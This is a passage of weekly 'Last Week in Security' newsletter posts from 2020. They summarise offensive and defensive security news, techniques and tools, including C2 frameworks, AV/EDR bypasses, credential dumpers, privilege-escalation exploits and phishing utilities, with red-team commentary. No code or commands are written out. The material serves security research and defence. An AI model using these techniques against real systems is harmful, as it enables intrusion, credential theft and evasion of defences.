  • CreateFile_based_rootkit - Windows' DOS origins rears its ugly head once again with a bug where NtCreateFile can access directories with strange names like " ." but CreateFile cannot - it returns " " instead. This could prove useful if EDR tools use CreateFile, and also hides directories from explorer.exe and cmd.exe. [T1562 Impair Defenses]

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • IntelOwl - analyze files, domains, IPs in multiple ways from a single API at scale.
  • freenom.com is a free domain registrar for .tk, .ml, .ga, .cf, and .gq domains. This could be useful for bug bounties or other engagements.
  • CFB is a distributed tool for capturing I/O request packets (IRPs) sent to any Windows driver. This is very useful for driver reverse engineering and fuzzing. Check out the examples here.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-07-20

By: Erik
20 July 2020 at 20:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-13 to 2020-07-20. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • capa detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate. Details on the Fireeye Blog.
  • project-citadel is a free & open source alternative project management tool that offers basic task tracking through a Kanban board (think Trello).
  • pwn-machine is a self hosting solution based on docker aiming to provide an easy to use pwning station for bughunters. This is a first release, but it could become a very cool platform to help automate the backend stuff required to find interesting bugs. More information in this blog post.
  • McAfee Total Protection (MTP) < 16.0.R26 Escalation of Privilege (CVE-2020-7283). Another AV allows for local privilege escalation due to symlink mishandling and overly permissive permissions. [T1068 Exploitation for Privilege Escalation]
  • RequestAADRefreshToken obtains a refresh token for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account). An attacker can then use the token to authenticate to Azure AD as that user. More info on the Specter Ops blog.
  • RuralBishop is practically a carbon copy of UrbanBishop by b33f, but all P/Invoke calls have been replaced with D/Invoke.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-07-27

By: Erik
27 July 2020 at 10:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-20 to 2020-07-27. MITRE ATT&CK techniques are in brackets where appropriate.

News

Techniques

Tools and Exploits

  • Boomerang is a tool to expose multiple internal servers to web/cloud. This project is in early stages, and has no authentication or encryption, but may provide a good base if you are looking to write your own tunneling agent with Go.
  • RpcSsImpersonator is an Administrator or Network Service to SYSTEM privilege exploit for Windows.
  • Malwarebytes-Disabler injects shellcode into a malwarebytes process which allows a user to disable "Malware Protection" even if the Malwarebytes administrator has set a password to protect this setting from being changed. [T1562.001 Impair Defenses: Disable or Modify Tools]
  • SpaceRunner enables the compilation of a C# program that will execute arbitrary PowerShell code, without launching PowerShell processes through the use of runspace and includes AMSI patching. [T1562.006 Impair Defenses: Indicator Blocking]
  • KITT-O365-Tool is a tool designed to make working O365 Business Email Compromise investigations easier and more efficient for DFIR and SOC analysts by pairing the power of PowerShell cmdlets with the ease of use of a GUI.
  • DeimosC2 is a post-exploitation Command & Control (C2) tool that leverages multiple communication methods in order to control machines that have been compromised. DeimosC2 server and agents works on, and has been tested on, Windows, Darwin, and Linux. It is entirely written in Golang with a front end written in Vue.js. This is a very impressive 1.0 release!
  • vopono is a tool to run applications through VPN tunnels via temporary network namespaces. This allows you to run only a handful of applications through different VPNs simultaneously, whilst keeping your main connection as normal.
  • dazzleUP is a tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. It uses the Windows Update Agent API instead of WMI (like others) when finding missing patches, and comes with a CobaltStrike cna script. [T1068 Exploitation for Privilege Escalation]
  • CVE-2020-15778 is a simple command injection in openssh <= 8.3p1. If you have access to a linux host without shell access but only scp access, you just got shell access.
  • Carbuncle is a tool for interacting with outlook interop during red team engagements; enumerate, read, monitor, and send email.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-08-03

By: Erik
3 August 2020 at 22:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-07-27 to 2020-08-03. MITRE ATT&CK techniques are in brackets where appropriate.

News

  • United States of America v. Nima Fazeli. Some really bad OPSEC on display from the teen that hacked Twitter a few weeks ago. The voice phishing combined with the 2FA bypass was very well executed, but the same cannot be said for post-exploitation actions.
  • New 'unpatchable' exploit allegedly found on Apple’s Secure Enclave chip, here’s what it could mean. Physical access is required, and it was patched on newer devices (A12/A13 based devices) but still an interesting development for iOS security.
  • There's a hole in the boot. Another week, another named and logo'd vulnerability. This one takes advantage of the fact that the YY_FATAL_ERROR() function of the Grub bootloader simply prints a message and then returns to the calling function, instead of actually being a fatal error that halts loading. This allows a heap buffer overflow in the config parser if an attacker can control the grub.cfg file. This one will be very hard to effectively mitigate, as blocking vulnerable versions of Grub will break existing deployments, but without blocking vulnerable versions downgrade attacks would be effective against patched machines. Update Grub and then update the revocation list to close this hole.
  • Attack Detection Fundamentals. F-Secure puts out great free workshops for red and blue teamers.

Techniques

  • Exploiting popular macOS apps with a single “.terminal” file.. The quarantine attribute is not correctly set by third party applications with file transfer capabilities (i.e. Slack) for .terminal files, which can lead to single click compromise of macOS endpoints.
  • CVE-2020–9934: Bypassing the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data. Setting the $HOME variable in launchctl allowed Matt Shockley to modify the TCC database without disabling system integirty protection and give himself every entitlement without prompting the end user. This is a great find, and the post includes a simple script to acomplish this. If you perfer a compiled Swift binary, that is available as well.
  • Sparkling Payloads. GateKeeper on macOS can be a challenge for getting payloads to run in certain cases (i.e. they are downloaded by a browser by a user). This post shows how to use a well established update framework to get benign code past Apple's review, and "update" it to a malicious payload after delivery.
  • Removing Kernel Callbacks Using Signed Drivers. Kernel exploits on Windows have been featured a few times in LWiS (2020-07-20, 2020-05-11), and this post is another good example of the power of kernel level execution on Windows. Blue teams should be closely monitoring driver loads on all endpoints by this point, but if they aren't use the techniques presented in this post to bypass any/all AV. Code here.
  • bunk_bot is built on Python and its main purpose is to attend your online classes for you. I've included it here despite it not being directly relevant to security because the techniques it uses to accomplish its goals can be applied to security problems. Think automating user creation or automating AV/EDR testing.
  • Zoom Security Exploit – Cracking private meeting passwords. 6 digit passwords and no rate limiting. What could possibly go wrong? The technique of simply removing the CSRF header surprisingly worked, and goes to show that you can never assume that because a control appears to be in place it is actually being enforced without checking.
  • The Curious Case of Aspnet_Compiler.exe. This post explores code execution with the Microsoft signed executable aspnet_compiler.exe. Another LOLBin!
  • Password Spraying Secure Logon for F5 Networks shows how to use a macro in burp suite to handle custom session rules. This method of request modification is generally applicable to lots of scenarios when brute forcing web logins.
  • Active Directory Computer Account SMB Relaying Attack. "SMB relaying is old hat" I hear you saying, which is true, but this specific flavor is new. With only unprivileged domain creds, an attacker can use the print spooler on one victim machine to authenticate to an attacker controlled relay which in turn allows attacker access as system to the second victim - assuming the first victim has admin rights to the second. The workhorse of this attack is this script.
  • One Click to Compromise -- Fun With ClickOnce Deployment Manifests. This was presented at BlackHat last year but just like the author, I missed it as well. One click + a security dialog = RCE. Test this out and it might become a new phishing technique to add to your toolkit.

Tools and Exploits

  • Unauthd - Logic bugs FTW. Security researcher Ilias Morad aka @A2nkF_, describes a lovely exploit chain, composed of several security vulnerabilities he uncovered in macOS. This chain creates a local privilege escalation (LPE), from user all the way to the kernel! Code here. [T1068 Exploitation for Privilege Escalation]
  • SharpAppLocker is a C# port of the Get-AppLockerPolicy PS cmdlet. [T1082 System Information Discovery]
  • hvmi - Hypervisor Memory Introspection. The main purpose of this project is to provide unmatched security from outside the virtual machine, by leveraging the hardware isolation provided by Intel VT-x. This is a super powerful capability, and a good post explaining how it works and what can be done with is is available here.
  • DSA-2020-128: iDRAC Local File Inclusion Vulnerability. If your iDRAC isn't on a locked down subnet with monitored access, you're doing it wrong. This vulnerability will likely bear fruit on internal assessments for years to come. No PoC yet.
  • freki is a self-hosted malware analysis tool which is able to quickly statically analyze malware, integrate with VirusTotal, and perform pattern matching with Yara rules.
  • C_Shot is an offensive security tool written in C which is designed to download, inject, and execute shellcode in memory - either its own process or a child process using parent process spoofing. The blog post shows how it can evade advanced EDR like CrowdStrike Falcon. I'm a bit surprised that it wasn't detected as it uses standard API calls to do APC process injection (VirtualAlloc, WriteProcessMemory, QueueUserAPC, ResumeThread). Pair this with direct syscalls for a likely more effective bypass. [T1055.004 Process Injection: Asynchronous Procedure Call]
  • Winstrument is a framework of modular scripts to aid in instrumenting Windows software using Frida for reverse engineering and attack surface analysis. Winstrument makes analyzing Windows apps easy, helping you quickly identify application functionality that might be insecure or warrant further review and could be useful on your next app assessment, or for finding a vulnerability in a Windows application on your next network assessment. Blog post here.
  • CVE-2020-1313. You thought there would be a LWiS without a Windows LPE? This is a proof of concept for an "older" (patched June 2020) vulnerability in the Windows Update Orchestrator Service. It won't give you an instant win, but will execute at 2320 or within 3 days.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • festin is a tool for discovering open S3 Buckets starting from a domain.
  • Mística is a tool that allows to embed data into application layer protocol fields, with the goal of establishing a bi-directional channel for arbitrary communications. Currently, encapsulation into HTTP, DNS and ICMP protocols has been implemented, but more protocols are expected to be introduced in the near future. [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol]
  • ATTPwn is a computer security tool designed to emulate adversaries. The tool aims to bring emulation of a real threat into closer contact with implementations based on the techniques and tactics from the MITRE ATT&CK framework.
  • Ventoy is an open source tool to create bootable USB drive for ISO files. Stop formatting the same USB over and over for the OS you need at the time, and just store and boot from a list of ISOs.
  • portmaster is a privacy app that at its core simply intercepts all your network connections. Think of a pi-hole for your computer. Or an ad-blocker that blocks ads on your whole computer, not only on your browser. This is an open-source version of Little Snitch or GlassWire. Still in alpha, but something to keep an eye on.
  • Hacking with environment variables is a quick post showing some little known environment variables that can be used to execute code in unexpected places.
  • Ciphey is a fully automated decryption tool using natural language processing & artificial intelligence, along with some common sense.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-08-10

By: Erik
11 August 2020 at 03:30

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-03 to 2020-08-10.

News

  • Exposing and Circumventing China's Censorship of ESNI. While I can't say this is a direct consequence of my DEF CON talk putting ESNI in the "mainstream" infosec media, the timing is suspect. I hope that TLS 1.3 adoption picks up to a point where this kind of censorship is too costly to be effective. In the meantime, workarounds are being researched.
  • U.S. Government Contractor Embedded Software in Apps to Track Phones (Paywall - Non-paywall here). SDKs and advertising identifiers can be used to track users across apps, and likely across phones. This feature is being sold to whomever can pay. While this has always been the case, seeing it spelled out is a bit frightening. iOS 14 brings additional privacy protections which might help curb this type of tracking, but the middle ground between "secluded privacy obsessed person" and "all your info is available to anyone who can pay" is becoming nonexistent.
  • The Current State of Exploit Development, Part 1. Ever wonder why you aren't popping shells unauthenticated on remote systems like you used to? This post walks through legacy and some modern exploit mitigations that are making the attacker's life harder.
  • Rewards for Justice – Reward Offer for Information on Foreign Interference in U.S. Elections. This is pretty interesting, "up to" $10 million for identifying or locating a person that is hacking US elections for a foreign government. Is the Department of State issuing letters of marque again?!

Techniques

  • Masking Malicious Memory Artifacts – Part III: Bypassing Defensive Scanners. Forrest Orr is back to drop more fileless malware knowledge. If you only read one thing this week, read this post. .Net DLL hollowing looks to be a weakness of all the tested memory scanners due to high false positives. Use this to your advantage when writing your next red team tool.
  • Building a lab with Server 2019 Server Core and PowerShell …then attacking it! If you don't have an AD lab setup yet, this is the guide you were waiting for.
  • Persistent JXA explores the strange world of "Javascript for Automation" on macOS and introduces a few persistence mechanisms for developer machines. Code here.
  • The Art Of Mac Malware is an online, free book from Patrick Wardle about macOS malware. It's collaborative, so review and add your knowledge! Be sure to check out his DEF CON talk which includes a very slick logic bug chain for sandbox escape here.
  • Ghostscript SAFER Sandbox Breakout (CVE-2020-15900). This is pure adversary emulation goodness. Red teamer needs a shell, researches a technology, fuzzes the technology, pwns the technology (0day), and shells the target. If you wonder why true red team/adversary emulation engagements are more expensive than a "vulnerability scan" where they hand you Nessus results, this is why. Well done @pruby.
  • Routopsy – Hacking Routing with Routers. Stop ping sweeping /16 networks and use the vulnerable routers to tell you about the actual ranges instead! Once you find a good target, use the same vulnerable routers to to inject a malicious route and get traffic from that target. Congratulations, you are now the router. The potential impact of this is pretty big. Consider what would happen if a target suddenly resolved every domain to a fake SSO page you control? The sensepost team gets extra credit for including two vulnerable scenarios as docker-compose files in the repo so you can test out the tool in your lab.
  • Exploiting vBulletin: “A Tale of a Patch Fail” is a great example of how a patch is not always the end of a bug's life. In this case vBulletin 5.0 to 5.4 can be exploited with a single curl command.
  • Chaining multiple vulnerabilities to exfiltrate over 250GB of PIA. These kinds of articles are amazing, but so rare. An actual exploit chain used against a real company. New tricks and tools to be found in this one.
  • Digging further into the Primary Refresh Token. The AD whisperer drops another post. This time he the explores inner workings of the CloudAP plug-in in lsass, the cryptographic keys used to authenticate with the PRT. These are accompanied by new features in ROADtools to interact with the PRT cookie and the new mimikatz version.

Tools and Exploits

  • TelemetrySourcerer can enumerate and disable common sources of telemetry used by AV/EDR on Windows. This will be super helpful for your AV/EDR lab.
  • Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities. This is top shelf exploitation. Browse to a website, get kernel execution. When I dream of "advanced nation state" exploits this is what I dream of. The talk isn't avaialbe yet, but the slides are.
  • go-sharp-loader. Pack your favorite .NET executables into this loader and run them from memory. Add some encryption for better AV evasion.
  • Octopus v1.0 stable: Cobalt Strike deployment & much more!. Not a new tool, but stable 1.0 is a big step. I love the concept behind a "pre-operation C2" as its what the best APTs are doing.
  • estigmergio.py infers prefixes/suffixes/common substrings inside a list of subdomains and build a dictionary. This is the kind of custom tooling that sets you apart from all the other bug hunters. Well played @TheXC3LL.
  • Bug-Bounty-Colab uses Google Collab as a "VPS" for bug bounties, much like penglab did (LWiS 2020-06-15). I wonder how long Google will allow this?
  • dropengine is a malleable payload generation framework. In practical terms, it allows you to define payloads using different modules (interfaces, crypters, decrypters, encryption keys, decryption keys, executors, and mutators) to rapidly generate a variety of payloads. It also includes support for environmental keying, which will keep your payloads undetected for longer by only executing on the desired targets without manual reversing. When delivering a binary to an unknown environment with possible EDR, this will prove very handy.
  • Stealthily Access Your Android Phones: Bypass the Bluetooth Authentication - BlueRepli. Android will allow access to contacts and other information via Bluetooth with no user interaction for at least one major manufacturer, and the rest it is a single prompt. Expect both law enforcement and malicious actors to take advantage of this. iOS is not affected.
  • vx includes a new HellsGate example written is pure assembly for dynamically extracting and invoking syscalls from in-memory modules on Windows. This could be used in your custom tooling to implement the HellsGate technique.
  • Spooler contains the tools developed during the Print Spooler research which was presented at Black Hat USA 2020 and DEF CON 28 Safe Mode ("A Decade After Stuxnet's Printer Vulnerability: Printing is still the Stairway to Heaven").
  • mole is a framework for identifying and exploiting out-of-band application vulnerabilities. The client is used to create payloads during manual testing and automatically injects tokens into the predefined payloads. The mole server then listens for and alerts when these out-of-band payloads are triggered. Useful for testing XSS, XXE, PDF, and OOXML vectors.
  • mkhtaccess_red. Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • overlord Overlord provides a python-based console CLI which is used to build Red Teaming infrastructure in an automated way. The user has to provide inputs by using the tool’s modules (e.g. C2, Email Server, HTTP web delivery server, Phishing server etc.) and the full infra / modules and scripts will be generated automatically on a cloud provider of choice. Currently supports AWS and Digital Ocean.
  • Turning on network protection. Did you know Microsoft Defender has a built in network protection feature? Enable it with a simple registry change, and pay no mind to the references to Defender ATP, it works on regular Windows 10 installs.
  • Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF supports mobile app binaries (APK, IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.
  • PurpleSharp is an open source adversary simulation tool written in C# that executes adversary techniques within Windows Active Directory environments. The resulting telemetry can be leveraged to measure and improve the efficacy of a detection engineering program. PurpleSharp leverages the MITRE ATT&CK Framework and executes different techniques across the attack life cycle: execution, persistence, privilege escalation, credential access, lateral movement, etc. It currently supports 37 unique ATT&CK techniques. Blog posts here.
  • reconness creates a platform to allow continuous recon (CR) where you can set up a pipeline of recon tools (Agents) and trigger it base on schedule or events.
  • IntelOwl is for everyone who needs a single point to query for info about a specific file or observable (domain, IP, URL, hash). Put in your API keys for all the services you manually query, and then have a single endpoint for getting information about indicators in your environment.
  • CSharpWinRM move laterally with WinRM from a CSharp binary (or better - in memory execution).
  • AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-08-17

By: Erik
18 August 2020 at 03:20

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-10 to 2020-08-17.

News

  • Internet Explorer and Windows zero-day exploits used in Operation PowerFall. Two 0days were used in this campaign that targeted a South Korean company, a user-after-free in IE 11 on Windows 10, and an elevation of privilege related to kernel memory handling. Even if you are on Windows 10, Internet Explorer is a bad idea.
  • Russian GRU 85th GTsSSDeploys PreviouslyUndisclosed Drovorub Malware. The NSA and FBI tear down Russian Linux malware and dig into all the details in this 39 page (!) report. They specifics on the server configuration shows that they had access to live C2 nodes. This tactic of naming and shaming nationstate malware started with the US CYBERCOM twitter, and its good to see it carry over into well researched reports.
  • New Developments: Retiring CTP and Introducing New Courses. CTP/OSCE are soon to be retired and replaced with three separate courses that must be complete to earn a "new OSCE." While I agree that OSCE is out of date, it does introduce good content, and I'm sure students will not be excited to have to pay for 3 courses to earn a certificate that used to be one. However, Offensive Security provides the best reasonably priced, hands on, recognized certificates out there (besides rastamouse's Red Team Ops).
  • Call Me Maybe: Ea­ves­drop­ping En­cryp­ted LTE Calls With Re­VoL­TE. Another instance of the RFC not matching implementation. Base station (eNodeB) implementations of VoLTE reuse keystreams for concurrent calls, allowing a malicious actor to capture a call, place another, and use the keystream from the second to decrypt the first. Demo here.
  • Microsoft Put Off Fixing Zero Day for 2 Years. Brian Krebs digs into CVE-2020-1464, an issue with how Windows validates file signatures commonly used to execute jar based attacks. Triage is hard, but this seems like an issue that should have been fixed much faster.

Techniques

Tools and Exploits

  • eidc32proxy. Is a pure Go proxy for eidc32 proximity systems. It allows for "skeleton key" credentials to operate locks without logging to the controler. Check out the demo here.
  • sinter is a 100% user-mode endpoint security agent for macOS 10.15 and above, written in Swift. This is inspired by Google's Santa but doesn't require a kernel extension (which is not allowed in macOS 11) and has more features.
  • Zolom is a C# executable with embedded Python that can be used reflectively to run python code on systems without Python installed. Yo dawg, I heard you like high level languages ...
  • SharpEDRChecker checks running processes, process metadata, DLLs loaded into your current process and the each DLLs metadata, common install directories, installed services and each service binaries metadata, installed drivers and each drivers metadata, all for the presence of known defensive products such as AV's, EDR's and logging tools.
  • A Change of Mythic Proportions. Apfell C2 is now Mythic C2 which better reflects how adaptable it is. This update is a big one, so if you have checked out Apfell in the past, be sure to take another look.
  • Windows-Setup-EoP. This is an exploit for a time of check/time of use vulnerability in the windows "feature update" (i.e. 1909 to 2004) process. Demo here.
  • VMProtect Tools
    • vmpattack is a VMProtect to Virtual-machine Translation Intermediate Language (VTIL) lifter. This can help get VMProtected binaries into a state that will help with analysis.
    • NoVmp is a project devirtualizing VMProtect x64 3.0 - 3.5 (latest) into optimized VTIL and optionally recompiling back to x64 using the VTIL library.
  • wacker is the first (I think?) tool for WPA3 dictionary attacks!
  • CVE-2020–14979: Local Privilege Escalation in EVGA Precision X1. Poorly written drivers are the gift that keep on giving. In this case, local privilege escalation is the gift. This driver is included in Screwed-Drivers.
  • dnsfserv is a fileserver over DNS, with wrapper library and example stager. You never know when you might be in a super restricted env and need to stage over DNS.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-08-24

By: Erik
25 August 2020 at 02:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-17 to 2020-08-24.

News

Techniques

  • Performing Kerberoasting without SPNs adds the -usersfile option to GetUserSPNs.py, which requests tickets for each line from the specified file using the NT-ENTERPRISE type, and changed the default behavior from usage of service principal names to usage of SAM Account Names. This allows the retrieval of a Kerberos ticket in scenarios that otherwise would have failed, and allows mass-checking a list of SAM accounts for Kerberos tickets, not just those accounts that have SPNs!
  • Attacking Azure & Azure AD, Part II introduces PowerZure 2.0 which add all kinds of neat features, my favorite being New-AzureIntuneScript which uploads a PowerShell script to Intune which will execute by default against all devices. Hope you have load balancing on your C2 server for all the shells that will call back!
  • Windows .Net Core SDK Elevation of Privilege. @RedVuln found the original vulnerability, and @itm4n dug into it. A nice Windows privesc for a user that has the .NET Core SDK installed, and isn't a local admin anymore, or SYSTEM persistence if they are.
  • Wireshark Tutorial: Decrypting HTTPS Traffic is a basic but well done tutorial.
  • How to contact Google SRE: Dropping a shell in cloud SQL. SQL injection in Cloud SQL! Just when you think the major cloud providers have security on lock, you read something like this. The good news is how fast the SRE responded and the issues were dealt with.

Tools and Exploits

  • DumpReparsePoints is a new tool from @tiraniddo that dumps all reparse points of an NTFS drive on Windows. What is a reparse point? Fun things like symbolic links, hard links, and directory junctions, among others. I'm sure this means there are about to be more file-link based attacks/LPEs from James soon.
  • SharpBlock. The tool isn't new but the fact you can load binaries via http or over a named pipe and inject them into memory is a huge new feature. Take inspiration from this for your next EDR bypassing loader.
  • LNKMod is a C# project to create or modify existing LNKs.
  • mapcidr is a small utility program to perform multiple operations for a given subnet/CIDR ranges.
  • tracee is a lightweight and easy to use container and system tracing tool. It allows you to observe system calls and other system events in real time. Intended as a debugging tool, tracee has implications for Linux red team tools for process monitoring system side.
  • tunshell is billed as a "remote shell into ephemeral environments" and acts a bit like ngrok + a shell. The beauty of tunshell is that its client is a statically-linked, pre-compiled binary which can be installed by downloading it with a one-liner script. It was built for debugging CI environments, but there are obvious red team use cases.
  • CmpDoReDoCreateKey Arbitrary Registry Key Creation EoP and CmpDoReadTxRBigLogRecord Memory Corruption EoP were patched and dropped with PoCs that aren't ready for use on an engagement but would be good starting points for weaponization.
  • Windows AppX Deployment Service Local Privilege Escalation (CVE-2020-1488). Another AppX bug leads to local privilege escalation that reminds me of CVE-2019-1064.
  • DVS - D(COM) V(ulnerability) S(canner) AKA Devious swiss army knife - Lateral movement using DCOM Objects. The DVS framework contains various ways to bypass remote hardening against DCOM by re-enabling DCOM access remotely and automatically grant the required permissions to the attacking user. The framework can also revert changes on the remote machine to their original state, prior to the attack.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • SharpKatz is a C# port if of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands for your C# in memory needs.
  • Wizer Training is a freemium phishing training platform. Very interesting model, and I'm excited to try it out. Don't be fooled by wizertraining.com which was briefly redirecting to knowbe4.com. If the competition is playing dirty, you must be doing something right!
  • wonitor is a fast, zero config web endpoint change monitor. For comparing responses, a selected list of http headers and the full response body is stored on a local key/value store file. No configuration needed.
  • espoofer is an email spoofing testing tool that aims to bypass SPF/DKIM/DMARC and forge DKIM signatures.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-08-31

By: Erik
1 September 2020 at 02:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-24 to 2020-08-31.

News

Techniques

Tools and Exploits

  • USO_Info_Leak contains two 0day heap address leak bugs in the usosvc service. The author claims to have 44 more Windows 10 elevation of privilege bugs that have been submitted to Microsoft but not handled well. I'll be following them closely to see if more are released.
  • Octopus isn't new but v1.2 sees a host of new features including: shellcode generation for x86 and x64, spoofed arguments, word macro generation, better AV evasion, and an indicator to show privileged user shells. More info here.
  • jwt-hack is a swiss-army knife for JSON web tokens, to include a dictionary attack.
  • RunasCs isn't new but v1.3 brings the ability to redirect stdout, stdin, and stderr to a remote host as well as other new features and fixes.
  • sonarhawk is a tool to create precise maps of WiFi networks using commodity GPS hardware and a portable computer. Supports Linux, MacOS, and Windows. Useful for mapping WiFi networks while on physical red team engagements or wardriving/warwalking. Similar to the Kismet plugin Kestrel.
  • gdb_2_root is a script for rooting x86_64 Google Play Android 10 images in an emulator.
  • LazyGhidra adds convenience functions to Ghidra like LazyIDA does for IDA Pro.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
  • bluescan is a powerful Bluetooth scanner for scanning BR/LE devices, LMP, SDP, GATT and vulnerabilities!
  • Hack-Tools is the all-in-one Red Team extension for Web Pentester. Useful features include: Dynamic Reverse Shell generator (PHP, Bash, Ruby, Python, Perl, Netcat), XSS Payloads, SQLi payload, LFI payloads, Base64 encoder/decoder, hash generator, and more.
  • monsoon is a fast HTTP enumerator that allows you to execute a large number of HTTP requests, filter the responses and display them in real-time.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-09-07

By: Erik
9 September 2020 at 02:15

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-08-31 to 2020-09-07.

News

Techniques

  • Pwning Windows Event Logging with YARA rules. This project allows for offensive operators to selectively mute logging using Yara rules in memory. It works by injecting a hook into the ETW event callback function and using Yara to scan the contents of every event to determine if it should be dropped or not. EvtMute contains all the code and example Yara rules.
  • Privilege Escalation in AWS Elastic Kubernetes Service (EKS) by compromising the instance role of worker nodes. AWS account-wide denial of service and enumeration is accessible by only having compromised a single, underprivileged pod in the cluster. The AWS accounts in question come by default when spinning up an EKS cluster. The post includes remediation steps to block the AWS metadata service access from pods to prevent this attack.
  • Abusing dynamic groups in Azure AD for privilege escalation. Putting AD in the cloud introduced new features, and new potential vulnerabilities, in this case the ability to abuse dynamic groups to access other accounts or modify attributes. If AD Connect Sync is in use, on-prem ADs can be affected as well.
  • So, You Got Access to a *nix system… Now What?. This quick post is a basic overview, but may contain a new script or command you didn't previously know about.
  • Custom DLL injection with Cobalt Strike's Beacon Object Files. Cobalt Strike is a great C2 platform, but the fact that it is popular means it will be detected without some work to modify it. In this post Tom Carver works through building a custom DLL injector using the new Beacon Object File spec from the 4.1 release.
  • WSUS Attacks Part 1: Introducing PyWSUS. Scary things happen when you can Man-in-the-middle connections. In this post, ARP spoofing is used to intercept and respond to a Windows update request which allows for arbitrary code execution as SYSTEM if the system is not using HTTPS for WSUS. Video here, code here.
  • living-off-the-land combines some tricks to achieve persistence with two registry writes (semi-hidden) and no files on disk.

Tools and Exploits

  • SharpSecDump is a .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user, but can use alternate credentials supplied on the command line. Note: this doesn't have DCSync functionality yet so no AD dumping - use SharpKatz for that.
  • SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector. AV/EDR detecting your standard injection methods? Try this latest iteration of the *Bishop series which uses some tricks and APC queuing to inject shellcode into a process. Code here.
  • CVE-2020-7460: FreeBSD Kernel Privilege Escalation. A rare FreeBSD privilege escalation for any 64 bit kernel since 2014. PoC here.
  • TREVORspray is a featureful Python O365 sprayer based on MSOLSpray which uses the Microsoft Graph API that can use SSH hosts to proxy requests.
  • vmpdump is yet another (this makes 3, see LWiS-2020-08-17) VMProtect deobfuscator.
  • Ubuntu ppp's CVE-2020-15704 wrap-up. On certain Ubuntu machines from 12.04 to 20.04 (KVM kernel builds) that don't have /dev/ppp, modprobe environment variables can be used for arbitrary file read.
  • Watchcom Security Group uncovers Cisco Jabber vulnerabilities. Cisco Jabber is often seen in enterprise environments for team collaboration and is another good example of how using Electron/Chromium based apps can turn a simple XSS into an RCE.
  • CVE-2020-0986: Windows splwow64 Untrusted Pointer Dereference. Google Project Zero drops this Windows privilege escalation (patched 2020-06-09) that was reported by Kaspersky Lab who found it being used in the wild.
  • chlonium is a C# application designed for cloning Chromium Cookies. The unique feature here is the utility to allow the easy importing of Chrome cookies into a second browser. Demo here.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • wordlist_generator generates wordlists with unique words with techniques mentioned in tomnomnom's report "Who, What, Where, When". It takes URLs from gau and splits them to get words in URLs. Then it requests each URL to fetch all words. Finally, wordlist_generator removes from wordlist everything from "denylists" directory files to keep only unique words, which you can use for domain, directory, parameter, vhosts, etc bruteforcing.

This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2020-09-14

By: Erik
15 September 2020 at 00:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2020-09-07 to 2020-09-14.

News

Techniques

Tools and Exploits

